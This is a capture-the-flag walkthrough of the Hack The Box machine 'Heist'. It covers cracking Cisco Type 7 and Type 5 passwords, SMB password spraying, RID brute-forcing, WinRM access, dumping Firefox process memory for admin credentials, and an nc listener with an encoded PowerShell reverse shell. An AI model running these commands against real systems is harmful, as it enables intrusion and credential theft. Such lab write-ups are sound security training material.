HTB - Heist
Target IP: 10.129.96.157 OS: Windows (SupportDesk) Difficulty: Easy Author: [g1nt0n1c]
1. Phase 1: Reconnaissance & Information Gathering
1.1 TCP Port Discovery
nmap -sV 10.129.96.157Port Analysis & Attack Surface
| Port | Service | Notes |
|---|---|---|
| 80/tcp | Microsoft IIS 10.0 | PHP login page (login.php) — support portal |
| 135/tcp | MS-RPC | Standard Windows RPC |
| 445/tcp | SMB | Potential for enumeration / null sessions |
| 5985/tcp | WinRM (HTTP) | Remote management — useful if we get valid credentials |
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Support Login Page
|_Requested resource was login.php
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
Key observations:
- IIS is serving PHP — unusual combination, suggests a specific app (not a default IIS install).
- WinRM on 5985 is a high-value port: if we obtain valid credentials, we get a direct interactive shell.
PHPSESSIDcookie has nohttponlyflag — minor finding, not the attack path here.
2. Phase 2: Vulnerability Analysis & Credential Extraction
2.1 Web Application — Cisco Config Disclosure
Browsing to port 80 reveals a Support Login Page. The guest/anonymous access path leads to an attached Cisco router configuration file containing password hashes.
Two hash types are present:
- Type 7 — weak XOR-based obfuscation, trivially reversible.
- Type 5 — MD5-crypt (
$1$...), requires dictionary attack.
2.2 Crack Cisco Type 7 Hashes
Type 7 is not real encryption — it is a fixed-key XOR. Any public tool can reverse it instantly.
# Reverse Cisco Type 7 passwords using ciscot7
# Tool: https://github.com/theevilbit/ciscot7
python ciscot7.py -p 0242114B0E143F015F5D1E161713
python ciscot7.py -p 02375012182C1A1D751618034F364154082.3 Crack Cisco Type 5 Hash
Type 5 uses MD5-crypt ($1$...). hashcat mode 500 handles this format.
# Write the hash to a file
echo '$1$pdQG$o8nrSzsGXeaduXrjlvKc91' > CiscoType7.hashes
# -m 500: MD5-crypt (Cisco Type 5) | rockyou.txt as wordlist
hashcat -m 500 CiscoType7.hashes /usr/share/wordlists/rockyou.txtRecovered credentials:
| Source | Username | Password |
|---|---|---|
| Config file | rout3r / admin | $uperP@ssword |
| Config file | rout3r | Q4)sJu\Y8qz*A3?d |
| Type 5 crack | Hazard | stealth1agent |
3. Phase 3: Initial Access
3.1 Password Spray — Round 1
Cross all known usernames against all recovered passwords over SMB. --continue-on-success prevents stopping at the first hit.
# Spray all username/password combinations over SMB
nxc smb 10.129.96.157 -u usernames.txt -p passwords.txt --continue-on-success
# [+] SupportDesk\Hazard:stealth1agent3.2 RID Brute-Force — User Enumeration
With valid credentials, enumerate all local accounts via RID cycling. SMB exposes SIDs; brute-forcing the RID component reveals usernames even without AD access.
# Enumerate local users by brute-forcing SID/RID over SMB
nxc smb 10.129.96.157 -u Hazard -p stealth1agent --rid-brute
# SUPPORTDESK\Hazard
# SUPPORTDESK\support
# SUPPORTDESK\Chase
# SUPPORTDESK\Jason3.3 Password Spray — Round 2
Add the newly discovered users to usernames.txt and spray again.
# Re-spray with expanded user list
nxc smb 10.129.96.157 -u usernames.txt -p passwords.txt --continue-on-success
# [+] SupportDesk\chase:Q4)sJu\Y8qz*A3?d3.4 Validate WinRM Access
Confirm chase can authenticate over WinRM before opening a shell.
# Test WinRM login — (Pwn3d!) confirms RemoteManagement group membership
nxc winrm 10.129.96.157 -u chase -p 'Q4)sJu\Y8qz*A3?d'
# [+] SupportDesk\chase:Q4)sJu\Y8qz*A3?d (Pwn3d!)3.5 Open Shell via Evil-WinRM
# Interactive PowerShell session over WinRM
evil-winrm -i 10.129.96.157 -u chase -p 'Q4)sJu\Y8qz*A3?d'4. Phase 4: Privilege Escalation (Process Memory Dump)
4.1 Identify Interesting Processes
List running processes. Firefox running as a service account on a server is anomalous — it may have a cached authenticated session in memory.
# List all running processes with CPU/memory usage
Get-Process
# Notable: firefox (PID 6548) — highest CPU/memory usage among Firefox instances4.2 Dump Firefox Process Memory
Transfer procdump64.exe (from Sysinternals) to the target, then create a full memory dump of the Firefox process. The -ma flag writes the complete process address space, not just the minidump headers.
# Full memory dump of PID 6548 (-ma = full dump)
./procdump64.exe -ma 6548 firefox.dmp4.3 Search the Dump for Credentials
Firefox’s login forms pass credentials as URL-encoded query strings. These strings remain in the process heap after the request is made.
# Search dump for login form parameters
type firefox.dmp | select-string "password="
type firefox.dmp | select-string "username="Found:
localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
4.4 Validate Administrator Access
# Confirm administrator credentials over SMB
nxc smb 10.129.96.157 -u administrator -p '4dD!5}x/re8]FBuZ'
# [+] SupportDesk\administrator:4dD!5}x/re8]FBuZ (Pwn3d!)4.5 Shell as Administrator
Generate a Base64-encoded PowerShell reverse shell payload at revshells.com, then execute it directly via NetExec’s -X flag.
# Start listener first
rlwrap nc -lvnp 8888
# Execute reverse shell payload as administrator via WinRM
nxc winrm 10.129.96.157 -u administrator -p '4dD!5}x/re8]FBuZ' -X 'powershell -e JABjA...'# connect to [10.10.16.149] from (UNKNOWN) [10.129.96.157] 49686
# whoami
# supportdesk\administrator
Deep Dive: Cisco Password Hash Types
Type 7 is not a hash — it is a reversible XOR cipher with a publicly known key (dsfd;kfoA,.iyewrkldJKDHSUBsgvoisuygfaJKDHSKJFHLHLS). It provides zero security and can be cracked without a wordlist.
Type 5 is MD5-crypt ($1$salt$hash), the same scheme used in older Unix /etc/shadow files. It is a real one-way hash but MD5 is fast and weak against GPU cracking with a common wordlist like rockyou.
Takeaway: Cisco configs in the wild frequently contain Type 7 passwords. Treat any leaked Cisco config as full credential disclosure.
Deep Dive: Process Memory Credential Harvesting
When a web application handles a login form, the credentials travel through multiple layers before the session cookie replaces them:
- Browser assembles the HTTP POST body:
login_username=admin&login_password=... - The string lives in the browser’s heap until the GC collects it.
- On Windows, the GC is non-deterministic — the data can persist for minutes.
procdump -ma snapshots the entire virtual address space of the process, including the heap. String-searching the dump (select-string, strings, grep) can recover credentials from any recently submitted form — not just login pages.
Defensive note: This technique works because the credentials were submitted over localhost HTTP (no TLS). Even with TLS, the plaintext exists in the process heap after decryption — but the window is shorter.